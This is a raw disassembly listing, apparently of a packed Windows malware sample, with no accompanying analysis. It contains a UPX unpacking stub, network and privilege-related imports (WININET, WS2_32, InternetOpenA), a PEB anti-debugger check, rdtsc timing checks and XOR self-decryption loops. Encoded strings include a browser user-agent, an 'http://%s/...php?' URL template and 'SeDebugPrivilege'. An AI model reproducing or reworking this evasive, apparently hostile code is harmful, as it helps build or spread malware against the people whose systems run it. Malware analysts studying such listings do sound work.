dd 0D5CCE50h, 76EC4687h, 3CB787BDh, 89D0D036h, 0B457E273h
dd 23914FECh, 6D846C7h, 0B4D8C0D4h, 0C8E47239h, 0A0E0ACDCh
dd 7CE888E4h, 1C8E4730h, 50F060ECh, 45F340F4h, 86B764D3h
dd 0BE70BF0Bh, 8B858E85h, 188B8A05h, 0A0406C49h, 8357C491h
dd 0F4D50E17h, 1D101B05h, 8340F10Bh, 326A8452h, 0A775BFAFh
dd 4D84628Ah, 74767830h, 5D74B409h, 653FA8CCh, 0A5636A88h
dd 0FE0B84C8h, 28A19C09h, 8303E083h, 866305C0h, 5BD3CAA3h
dd 51CFC42Ah, 10B9186Eh, 661C3D1Eh, 0D6CE9DEEh, 3F140E26h
dd 3D9A0497h, 0D56150E8h, 1425A00Bh, 0CD4B4D21h, 0D2415662h
dd 7D09E592h, 19419836h, 0C401F454h, 2E987A04h, 0AB8BE407h
dd 0B408B9F6h, 481FC523h, 436839C7h, 2565140Ch, 84102550h
dd 0E04DBFDDh, 0BF501D6Ah, 3C4C4F18h, 0C1D0514Fh, 743F81EAh
dd 0BB0A3D37h, 32BD758Ah, 53D942B3h, 60D8B3F4h, 53BC4906h
dd 0BDB3383Dh, 0EBB17EE6h, 32CE590Fh, 65B068B6h, 0E227A0C1h
dd 0D12A0E65h, 58C22638h, 0D9B9DA18h, 0BB4634B2h, 5E1C0DB9h
dd 0EB05066h, 57125E1Eh, 964EC6F0h, 0C6314CEEh, 0B6413BBBh
dd 2CFD90CCh, 90B650B6h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF2509CDh, 5D32BA1Eh, 44330C69h, 0EC5B3D5Ch, 6A7E6883h
dd 0CC401113h, 84D0A99Bh, 311BFF00h, 661DF805h, 0F4109E46h
dd 0BE511FF0h, 0B048D56Fh, 1472048Dh, 2D0BE981h, 0FD8FEDF5h
dd 17018504h, 0C82BEC73h, 8B0CC48Bh, 0D8088BE1h, 0FF6ED6C8h
dd 435C5004h, 4055C64h, 58D8D800h, 0A3000049h, 420900A8h
dd 6C5D2FCh, 5224F102h, 80314153h, 0FFFFFFC8h, 0F50101DDh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 5E1A9544h, 0FFFFFFE8h, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 377FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 49534D20h, 0ED6FFFF7h, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 2EECF734h, 0C7E445h
dd 0C40104D4h, 0F7DF0EB4h, 90A0CF3Ch, 68047480h, 0CF3D580Eh
dd 48097CF3h, 30D4743Ch, 9364DF3Ch, 10222045h, 0B600304Ah
dd 0F8F90DFFh, 76631340h, 75722E76h, 0D8DB777Eh, 700D6F6h
dd 976C6465h, 0C1660F65h, 0EDFFCA65h, 616573FDh, 0E686372h
dd 626F721Fh, 6863786Fh, 6F676E61h, 0D2E6EDFFh, 0C74651Fh
dd 622E6472h, 61007A69h, 6B686328h, 91B61762h, 740C6D61h
dd 24782D06h, 0E6EDB6CDh, 6F6C0600h, 6B37620Eh, 0FBDBF647h
dd 27626B6h, 76742E7Ah, 6F74111Bh, 176E2E70h, 30B60215h
dd 27730F69h, 3FC2E33h, 0F788DB6h, 6C756461h, 4B652D74h
dd 6DDB7269h, 3380CDFBh, 73A66E6Fh, 622E744Eh, 2B01F767h
dd 67694F7Ch, 77780032h, 0FECE2C61h, 626AED6Dh, 9B00AD62h
dd 6166617Ah, 221F2EA8h, 655DDBE1h, 61AF5C23h, 0F1646362h
dd 65FFDBB7h, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FF7A7978h, 54BFFFF2h, 44434241h, 48474645h, 4C4B4A49h
dd 504F4E4Dh, 56555451h, 5A595857h, 1B9BFBF8h, 49642563h
dd 6F530044h, 5C9E7466h, 706C694Dh, 0F90656BBh, 0DA575C0Dh
dd 0FE007374h, 4774E30Fh, 74684F31h, 2F3A7074h, 0C273252Fh
dd 0BC0EE6Fh, 2EC3912Fh, 3F706870h, 0EDF9ED3Ah, 260F3DDBh
dd 66E6373h, 6E692664h, 0F3B7666h, 3DF6EC76h, 13263032h
dd 0EB373D74h, 32313958h, 0BF87B237h, 3101D06Bh, 3030383Ah
dd 0DF07652Fh, 80FFFF00h, 5DDF1030h, 0B966C933h, 758D01EEh
dd 8AFE8B05h, 6FFFE206h, 7993CDBh, 302C0646h, 88993446h
dd 0EDE24707h, 0DAE80AEBh, 0B46FF7FEh, 676507DFh, 9993712Eh
dd 0FD1201C9h, 16FD91BDh, 0DFFFEFF7h, 6872C107h, 66FD42AAh
dd 0BA10FDAAh, 98A91C14h, 98F3C91Ah, 0FFB308F1h, 2865BB1h
dd 9010C071h, 9237CB5Fh, 781C9659h, 0F93ED3Ah, 57E414FBh
dd 3A0A7D71h, 9DF34571h, 9D2304F1h, 989BEFBh, 119C04F1h
dd 0EF67B340h, 0F3FD8EEDh, 1C10F0E3h, 59B20BDCh, 25C99B60h
dd 3D8F9601h, 414D9F6h, 71CA17A1h, 688D2B9Eh, 0EDAD9161h
dd 1A4637B3h, 111D960Ah, 0C850B228h, 6D9FED00h, 0DC14996Fh
dd 12255557h, 91C0A44Eh, 0FD994912h, 0EDDEDFECh, 140054F7h
dd 0CBCA3AC4h, 0FF1C3B71h, 6C21E424h, 1ADD87B3h, 8FCDCDCFh
dd 3F812C66h, 0FBB66F1Eh, 0B8B0FB9Fh, 12CDC383h, 0CBC9A85Dh
dd 7F64251Dh, 24AD9DB2h, 0A6485A0Bh, 0B314C096h, 1BC9FECBh
dd 0EBA7294Ch, 0E9BA9CF3h, 0D9FFF716h, 26F434F7h, 0EFCF571h
dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 766FFFEFh, 16A0A8ECh
dd 0FFC5B701h, 0E9ECE9EDh, 0E1FCB7FDh, 0FBBFD2Ch, 0F5CA0161h
dd 0F25AFCFCh, 0FCF7EBFCh, 0FFABAAF5h, 0D6BFFFE5h, 0AAF934C7h
dd 2A25B459h, 0ACC9662Ah, 0B7819093h, 83639D90h, 9271CDC9h
dd 67F0BEECh, 3519BF30h, 95D91451h, 2A91720Ah, 0FFFBC871h
dd 0D2EB20FFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah
dd 474A9A8Bh, 46FEDFFFh, 9BAB9EEBh, 20A319DBh, 0DDA26CECh
dd 9EED85BDh, 81E8A2DFh, 0FDBFFFCDh, 125544EBh, 961FBDC8h
dd 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 0BBF8105Ah, 960B09FFh
dd 664922D0h, 12FEFD7Fh, 0C25AA987h, 6EDB4095h, 1285026Fh
dd 5A910482h, 9CFF7CBh, 0A767F9B9h, 4D53FF85h, 53187242h
dd 0F4BFFFC8h, 62FEFFCFh, 43500200h, 575445ABh, 204B524Fh
dd 474F5250h, 0ED624152h, 204DE35Bh, 4C17CD31h, 24D4E41h
dd 0EB52B70Ah, 3D66D390h, 676B03DFh, 4BB696EBh, 0E707587h
dd 27611A33h, 1F2A234Dh, 583274B6h, 32323221h, 5833312Eh
dd 18FE66D3h, 8B323C20h, 0C95A25A4h, 7A0773C8h, 0DBEC1B1Ah
dd 23FF0Ch, 140A1104h, 0DD40520h, 185DADEh, 4B4C0069h
dd 68505353h, 4BE48F6h, 8829772h, 240057E0h, 0EB605DCDh
dd 6F30006Eh, 3A73009Dh, 7B7B2274h, 90130B1h, 3500398Ch
dd 7301B223h, 72E1D5Bh, 0C9ABDA00h, 8273C80h, 0EC57DA20h
dd 9F324E24h, 461A0003h, 6407923h, 4007471Bh, 45060006h
dd 101B9FFFh, 8A151F01h, 48E088h, 444004Fh, 292FFFF6h
dd 0F27A6A19h, 281C49E4h, 742530AFh, 0E1536710h, 4DF214F2h
dd 3075DF5Ch, 0BAF70400h, 75CDAE6h, 5C085ABDh, 0D8DD4D61h
dd 72E5DC8h, 2E380036h, 491B3077h, 0B62E6CECh, 1043EC00h
dd 0E5633F00h, 6439E403h
dd 4DC08A2h, 0B7FC83D8h, 0FF1640h, 0E00DEDEh, 19F1600h
dd 26FD2602h, 2840484Ch, 6110319h, 8BF70D1Bh, 0D374D96Ch
dd 90A5C370h, 9C2AB2EFh, 6077256Bh, 109FB6CFh, 1B04480Eh
dd 0B73E1354h, 5A545D75h, 22596326h, 45CBC75Ch, 0E7FCD20Fh
dd 58765h, 4810030Bh, 0FFB810B8h, 0E7B17FFh, 286A050Bh
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 0FF85F62Eh, 5D5FF5B1h
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 0B9F2D160h, 0F40C5EC8h
dd 0CA060A3h, 5790F200h, 0CB10CA0h, 0C8E4EFFBh, 880CA000h
dd 90040h, 0EC0703ECh, 0E49E11h, 4F401495h, 0BF40707Ch
dd 1B2297B2h, 13430700h, 23FF09E7h, 138578h, 0E9A65BABh
dd 63F81013h, 2F90273Ch, 230EFEFFh, 60C30740h, 8408E651h
dd 0F74F9388h, 10B94349h, 0B801FFEEh, 0E4D98710h, 0AD200CC9h
dd 7C7F070Dh, 0FC85796h, 700118D8h, 3E400F84h, 0F8495E4h
dd 36000F95h, 21BF279h, 6C0F847Fh, 0AB7B000Fh, 0A89A1E12h
dd 0FF13436Fh, 1F223024h, 50586E69h, 6C725020h, 2B029Bh
dd 39014446h, 0F2113F24h, 123C6B32h, 0EC027515h, 41F21035h
dd 941C0053h, 72BFFE01h, 0C606EB88h, 73255C5Ch, 6370695Ch
dd 0FFE5D424h, 0EC81666Fh, 0E4FF071Ch, 44655300h, 67756265h
dd 0E8DF7669h, 67ADD463h, 6A6441CFh, 6F548975h, 0DB92656Bh
dd 176EB266h, 126F4C73h, 0FD1C7075h, 61567F76h, 4165756Ch
dd 28704F17h, 2C77636Fh, 34C6A475h, 61766B00h, 0DF053367h
dd 75E318D4h, 39316DCDh, 0FE6A322Dh, 9F5A3A37h, 72545F6Ch
dd 6E577961h, 96DD4364h, 61AF36DAh, 6F94521Eh, 0AD685405h
dd 0CCEA354h, 7C45614h, 0BA99B65Ch, 532841B5h, 3EA37845h
dd 0FA34356Eh, 0F54BB3D2h, 544822F3h, 7D835054h, 404B46A9h
dd 4F6C9C20h, 0BB0A0D4Bh, 1EF52B5h, 244CB4Bh, 0CA044C2Dh
dd 676ADF66h, 25203A59h, 0DA2F1875h, 28587B5Ah, 26B97954h
dd 6D5A70A7h, 63B2B6A6h, 2E2F15AFh, 8EA9EE56h, 72BF2DCBh
dd 59B4CBCDh, 4757B18Bh, 1E3FC304h, 372A942Dh, 0F1640200h
dd 0E95FED0Bh, 6D9573D7h, 0B1637673h, 2DDF77D7h, 25692D5Eh
dd 175F320Fh, 98B73475h, 7BD2F6Bh, 38393103h, 0D34D34DBh
dd 34353637h, 75236933h, 7DCE9A6h, 2F313203h, 0DEF60C39h
dd 3837D9h, 37073B43h, 8320C832h, 0C8343536h, 330C8320h
dd 93523132h, 0FB8B2CD4h, 0B7F9E03Ah, 0C7EDB58Ah, 54464F47h
dd 45524157h, 9163F0Dh, 75435CD7h, 56297272h, 6C378442h
dd 5C1E73E8h, 0B36E7552h, 0D0B6ED37h, 0EA6F74E2h, 20306838h
dd 7FF81B53h, 0FB0F1A14h, 736E6753h, 796A7264h, 0CB564472h
dd 7E741768h, 0B9AAEAA7h, 5F7A43C2h, 0CE23h, 4C10E147h
dd 47136055h, 535E01BBh, 9E432053h, 0D5762067h, 0ADBD9B53h
dd 945876DCh, 7C23B532h, 2D82F642h, 0E3471A1Bh, 23CB7337h
dd 79931217h, 0A35A8473h, 4200F1B1h, 75D72077h, 0BDADB023h
dd 6D1B13C5h, 0DD975220h, 0A5B73772h, 2044180Dh, 2F662620h
dd 2D856D67h, 2AAC73D9h, 22632463h, 0FED722D9h, 20797469h
dd 1E6E614Dh, 1831F81Ah, 420000Ch, 15455D12h, 0FB2493C4h
dd 0C0017119h, 65657246h, 0B7E00D0Ch, 470DCD47h, 6F4D7465h
dd 2F14BF87h, 434665C5h, 406D614Eh, 74736C01h, 35DEF772h
dd 0A956380h, 79706F43h, 0E1480A19h, 456102DEh, 22326578h
dd 0F8A5FFEDh, 6C6F6F54h, 3233703Bh, 70616E53h, 746F6873h
dd 9B5BBA19h, 32127414h, 540F7372h, 235AE60Bh, 182C35A3h
dd 0F60B6C21h, 78654E01h, 41616974h, 16BFFB54h, 0CF76453Ch
dd 7469616Bh, 53726F46h, 0ED74423Ch, 4F7B676Dh, 2C766A62h
dd 0E025A144h, 8D22B59Bh, 0CD964CB7h, 45DB76CDh, 2F725072h
dd 48196972h, 0EF64BDD6h, 486573FDh, 0C646E61h, 886C3255h
dd 8B61B59h, 4618E06Eh, 46D735F1h, 64B14465h, 59498B4Bh
dd 530C1BC0h, 64656B1Dh, 0ADDD1F45h, 1270B36Dh, 661D4061h
dd 1153246Fh, 96EC9B3h, 6EC17065h, 25CFF64Bh, 12EE9E9Bh
dd 6464410Bh, 0EF660F72h, 4CD9221Bh, 61726269h, 0CD15B567h
dd 4D2BC1B5h, 6C137C82h, 0BB961016h, 8763CF9Ch, 54F685B5h
dd 75969869h, 2B4DDE65h, 0B15B092h, 0B4B44278h, 0D366C37h
dd 0E539AF5Dh, 5D22CC21h, 78456862h, 66C25B6Dh, 630AF631h
dd 373C6D13h, 522D8DC1h, 87B591Bh, 2ECD82ADh, 38657A94h
dd 9F9D5B5Ch, 2CD1937Dh, 654B9367h, 0EC3B4579h, 7810CE40h
dd 0A510F99h, 5AC25EC0h, 309011E8h, 426C5987h, 0D21021E7h
dd 7B70A107h, 62410C51h, 6853B024h, 688D0E29h, 0FF78F1F6h
dd 0D9851AC1h, 10892877h, 7DB662BBh, 6112440Ah, 6669320Eh
dd 0B63AD61Bh, 8F67BC79h, 6C362B75h, 436F616Fh, 2C796FC0h
dd 23506F11h, 52106770h, 3F900E8Fh, 0B4A438F6h, 71634114h
dd 70726975h, 4DD874AEh, 3AA03549h, 59A7C336h, 73ECDE13h
dd 6D06BC72h, 0D1CE18B1h, 840E27B2h, 99DA150Fh, 1D4D536Bh
dd 0C54A445Fh, 3FB8740Ah, 0C5E8685Fh, 6EC46D27h, 0AD0702CDh
dd 880D696Fh, 660AD172h, 14E955B3h, 40288901h, 0F3488CD3h
dd 0CC652D15h, 0EC0CC362h, 0E10A1415h, 0DF26106Eh, 776C49ACh
dd 0C20B7073h, 0B75BB669h, 0F44F4166h, 3DB6FC28h, 8B2C2834h
dd 1141A155h, 16C05212h, 6A615F0Eh, 6B14C370h, 0C9416E09h
dd 3BB86658h, 1A877453h, 0F5135B3Fh, 7940EB45h, 2C020273h
dd 0D2CB2CBh, 346F3901h, 0B2CB2CB2h, 4090C17h, 2AA4F413h
dd 141610CBh, 7C834550h, 74EC4AABh, 40E07ED2h, 0CE8011E0h
dd 10F00FDh, 0BE06010Bh, 6ABA120Ch, 0EFCB20ECh, 31431024h
dd 0BA4B020Bh, 7283259h, 364600Ch, 341E733Bh, 8060710h
dd 37B39609h, 0E33F8C2Fh, 6405DB0Ah, 2E1E0180h, 0B06C0C5Bh
dd 263207DDh, 0DBC42890h, 7D0483E3h, 642EE004h, 6E54FBE7h
dd 1221DD21h, 162C27h, 0C08574BEh, 0C9314648h, 54h, 0
align 10h
pusha
mov esi, offset dword_31436000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31437CA2
; ---------------------------------------------------------------------------
align 8
loc_31437C98: ; CODE XREF: UPX1:loc_31437CA9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31437C9E: ; CODE XREF: UPX1:31437D36�j
; UPX1:31437D4D�j
add ebx, ebx
jnz short loc_31437CA9
loc_31437CA2: ; CODE XREF: UPX1:31437C90�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CA9: ; CODE XREF: UPX1:31437CA0�j
jb short loc_31437C98
mov eax, 1
loc_31437CB0: ; CODE XREF: UPX1:31437CBF�j
; UPX1:31437CCA�j
add ebx, ebx
jnz short loc_31437CBB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CBB: ; CODE XREF: UPX1:31437CB2�j
adc eax, eax
add ebx, ebx
jnb short loc_31437CB0
jnz short loc_31437CCC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31437CB0
loc_31437CCC: ; CODE XREF: UPX1:31437CC1�j
xor ecx, ecx
sub eax, 3
jb short loc_31437CE0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31437D52
mov ebp, eax
loc_31437CE0: ; CODE XREF: UPX1:31437CD1�j
add ebx, ebx
jnz short loc_31437CEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CEB: ; CODE XREF: UPX1:31437CE2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31437CF8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CF8: ; CODE XREF: UPX1:31437CEF�j
adc ecx, ecx
jnz short loc_31437D1C
inc ecx
loc_31437CFD: ; CODE XREF: UPX1:31437D0C�j
; UPX1:31437D17�j
add ebx, ebx
jnz short loc_31437D08
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437D08: ; CODE XREF: UPX1:31437CFF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31437CFD
jnz short loc_31437D19
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31437CFD
loc_31437D19: ; CODE XREF: UPX1:31437D0E�j
add ecx, 2
loc_31437D1C: ; CODE XREF: UPX1:31437CFA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31437D3C
loc_31437D2D: ; CODE XREF: UPX1:31437D34�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31437D2D
jmp loc_31437C9E
; ---------------------------------------------------------------------------
align 4
loc_31437D3C: ; CODE XREF: UPX1:31437D2B�j
; UPX1:31437D49�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31437D3C
add edi, ecx
jmp loc_31437C9E
; ---------------------------------------------------------------------------
loc_31437D52: ; CODE XREF: UPX1:31437CDC�j
pop esi
mov edi, esi
mov ecx, 86h
loc_31437D5A: ; CODE XREF: UPX1:31437D61�j
; UPX1:31437D66�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31437D5F: ; CODE XREF: UPX1:31437D84�j
cmp al, 1
ja short loc_31437D5A
cmp byte ptr [edi], 1
jnz short loc_31437D5A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31437D5F
lea edi, [esi+5000h]
loc_31437D8C: ; CODE XREF: UPX1:31437DAE�j
mov eax, [edi]
or eax, eax
jz short loc_31437DD7
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31437DA9: ; CODE XREF: UPX1:31437DCF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31437D8C
mov ecx, edi
jns short near ptr loc_31437DBA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31437DBA: ; CODE XREF: UPX1:31437DB2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31437DD1
mov [ebx], eax
add ebx, 4
jmp short loc_31437DA9
; ---------------------------------------------------------------------------
loc_31437DD1: ; CODE XREF: UPX1:31437DC8�j
call dword ptr [esi+7094h]
loc_31437DD7: ; CODE XREF: UPX1:31437D90�j
popa
jmp loc_314324EF
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31438000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C3528Dh, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
xchg eax, ebx
push 0ED01C390h
mov eax, esp
call eax
pop ebx
call loc_3143826F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:31438219�j
jmp short near ptr loc_31438214+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3143826E
call $+5
pop ebp
sub ebp, 402338h
mov eax, [ebp+402385h]
add eax, [ebp+40238Dh]
mov esi, eax
mov eax, [ebp+402389h]
add eax, [ebp+40238Dh]
push eax
pusha
mov edi, esi
xor ecx, ecx
mov dl, [ebp+402395h]
loc_3143825E: ; CODE XREF: UPX2:3143826B�j
lodsb
xor al, dl
add dl, al
stosb
inc ecx
cmp ecx, [ebp+402391h]
jl short loc_3143825E
popa
locret_3143826E: ; CODE XREF: UPX2:3143822A�j
retn
; ---------------------------------------------------------------------------
loc_3143826F: ; CODE XREF: UPX2:3143820B�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
add [eax+7Ch], al
add [ebx+31h], al
add [esi], bl
; ---------------------------------------------------------------------------
dd 300000h, 75Ch dup(0)
; ---------------------------------------------------------------------------
loc_3143A000: ; DATA XREF: UPX2:3143CFD0�o
call $+5
mov eax, [esp]
cld
mov [eax+2FCBh], ebx
test dword ptr [eax+2886h], 80000000h
mov ebx, [esp+4]
jz short loc_3143A04C
pop ecx
mov [eax+2FCFh], esi
push edi
pop dword ptr [eax+2FD3h]
cmp byte ptr [eax+288Ah], 0E8h
jnz short loc_3143A043
add ebx, [eax+288Bh]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3143A04B
; ---------------------------------------------------------------------------
loc_3143A043: ; CODE XREF: UPX2:3143A034�j
mov ebx, [eax+288Ch]
push dword ptr [ebx]
loc_3143A04B: ; CODE XREF: UPX2:3143A041�j
pop ebx
loc_3143A04C: ; CODE XREF: UPX2:3143A01D�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1E05h
sub ebp, 361005h
mov edi, [esp+4]
lea esi, [ebp+363898h]
mov ecx, 0C5h
rep movsb
call sub_3143A0C1
mov ecx, eax
call sub_3143A0C1
sub eax, ecx
jz short loc_3143A095
cmp eax, 100h
ja short loc_3143A095
lea eax, [ebp+3610D4h]
mov dl, [eax-10h]
call sub_3143A0C5
jmp short loc_3143A0D4
; ---------------------------------------------------------------------------
loc_3143A095: ; CODE XREF: UPX2:3143A07C�j
; UPX2:3143A083�j
test dword ptr [ebp+36388Bh], 80000000h
jz short loc_3143A0BF
lea esi, [ebp+36388Fh]
mov edi, [esp+4]
movsb
movsd
mov esi, [ebp+363FD4h]
mov edi, [ebp+363FD8h]
mov ebx, [ebp+363FD0h]
loc_3143A0BF: ; CODE XREF: UPX2:3143A09F�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_3143A0C1 proc near ; CODE XREF: UPX2:3143A06E�p
; UPX2:3143A075�p
rdtsc
retn
sub_3143A0C1 endp
; ---------------------------------------------------------------------------
db 0F0h
; =============== S U B R O U T I N E =======================================
sub_3143A0C5 proc near ; CODE XREF: UPX2:3143A08E�p
mov dh, dl
mov ecx, 27B7h ; CODE XREF: UPX2:3143A145�j
loc_3143A0CC: ; CODE XREF: sub_3143A0C5+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_3143A0CC ; CODE XREF: UPX2:3143A0F8�j
retn
sub_3143A0C5 endp
; ---------------------------------------------------------------------------
loc_3143A0D4: ; CODE XREF: UPX2:3143A093�j
jno short loc_3143A0D9
sal byte ptr [eax], 1
dec edi
loc_3143A0D9: ; CODE XREF: UPX2:loc_3143A0D4�j
pop edi
adc ebx, edi
db 3Eh
xor al, 38h
sub [ebx+54h], eax
sbb [ecx-3F2E1FE5h], al
mov al, 0D5h
jg short near ptr loc_3143A0F6+1
mov bl, 63h
adc edi, [esi+edx*2-5Fh]
sub [eax-4Bh], dl
loc_3143A0F5: ; CODE XREF: UPX2:3143A11A�j
xchg eax, ebp
loc_3143A0F6: ; CODE XREF: UPX2:3143A0EA�j
cmp al, 4Bh
loopne near ptr loc_3143A0D1+1
xchg eax, ebx
push ebx
sti
adc dh, [eax-35h]
jp short loc_3143A13A
adc esi, ebx
mov eax, ds:0D603D34Dh
and eax, ebp
add byte ptr [eax+esi], 25h
dec ecx
mov cl, 58h
adc eax, 0B4A1936Fh
mov ah, 0B5h
inc edx
jp short loc_3143A0F5
sub eax, 144C79A3h
stosd
bound esp, [ecx+ebp*4]
jecxz short near ptr loc_3143A148+2
iret
; ---------------------------------------------------------------------------
dd 0BDEA407h, 0BB537C0Ah, 39714BBh, 0C0DC0803h
; ---------------------------------------------------------------------------
mov al, 0A0h
loc_3143A13A: ; CODE XREF: UPX2:3143A100�j
shr esp, cl
pop ds
adc esi, ds:744E5108h
insb
xchg eax, ebp
loopne near ptr loc_3143A0C7+3
aas
loc_3143A148: ; CODE XREF: UPX2:3143A125�j
sub ds:50564BAEh, dx
test al, 3Dh
and [eax], dl
add [ebx-3B5E4A6Eh], dh
; ---------------------------------------------------------------------------
db 0C5h, 0D5h, 0F6h
dd 1240E15h, 0D6EF7330h, 0FBE26579h, 8D78A086h, 7506070h
dd 615C5455h, 0B2959483h, 80E2CFC2h, 0C9869F23h, 362B16B5h
dd 0C31308F0h, 4015A0B0h, 0BF53E47Fh, 0FF40DFCFh, 0F6EBD665h
dd 8F5025B0h, 4053E1F5h, 2DADA030h, 0C1D0D6E5h, 356FB4C5h
dd 40665FA0h, 153DADCEh, 455FE0C6h, 80A6B534h, 0E5D3679Bh
dd 2635B4h, 0B47563F0h, 809096A5h, 5528C5F3h, 83102006h
dd 0F6C59C55h, 46C7A0B0h, 7642B2F5h, 0B5992130h, 0C0E6DBCAh
dd 9560153Dh, 89636046h, 3B569DBDh, 0E061E0C6h, 80932B58h
dd 0D5AF3F70h, 261BB6h, 0CFCF0831h, 80907434h, 5417EB70h
dd 0C313605Ah, 0C0C0E098h, 0BE1529B8h, 2850564Bh, 104FC0h
dd 552FE09Ah, 80A69B0Eh, 0C45FA0F5h, 1022DEh, 0C0656D67h
dd 0B9096A0h, 4BACD99Fh, 0ED912030h, 0C0E6F0F0h, 92C2353Dh
dd 0E5A36046h, 0EC93C2CFh, 0AA2C6BD0h, 0D95093B8h, 5B69F5FDh
dd 0ABE32006h, 97591C7Bh, 9CD75EA0h, 40530827h, 95EF2031h
dd 0C0E6DBCEh, 5B06433h, 0DFD46FB0h, 97102032h, 0C1BAE09Ah
dd 8094A0D8h, 405008F0h, 95EF2031h, 0C0E6DBCEh, 49F6035h
dd 405062F2h, 6840205Ah, 0C0D4E0F0h, 6851A0DAh, 413A377Ch
dd 114860h, 552FE0F1h, 80A69B8Eh, 41506A18h, 3E85DF30h
dd 28D0D6CBh, 8090A0B5h, 40523199h, 59104A30h, 0CABAEA13h
dd 0BB22354Fh, 0B1BB6046h, 5EADA3F3h, 0C0D0D6CBh, 82A424BFh
dd 46B86070h, 4E102030h, 8C9CA4A4h, 0FA055FB0h, 0CD50564Bh
dd 3607EA85h, 4D19D3F0h, 0B6AB660Dh, 0D35ED170h, 1253D8h
dd 3A6D63F0h, 8090968Bh, 4250E47Fh, 859B2030h, 0C0E6DB3Ah
dd 0F91D04Fh, 766782F5h, 0E295AB30h, 3FD0D6CBh, 51FA1C0h
dd 4066585Fh, 3BDEA5BBh, 0B02FE0C6h, 0B6152FB1h, 0CB505648h
dd 362BF2BDh, 3FCA03F0h, 51FA1C1h, 40665833h, 3BCAADBBh
dd 0C933E0C6h, 0F91D14Fh, 766830F5h, 1A8C830h, 7D5DE0F0h
dd 80A69CE0h, 403AAFFBh, 70EFF9C6h, 0C33163F4h, 7993E0DAh
dd 2A500A27h, 0D7A5AD28h, 79D0D6E5h, 8090A0A9h, 0BE1D64FDh
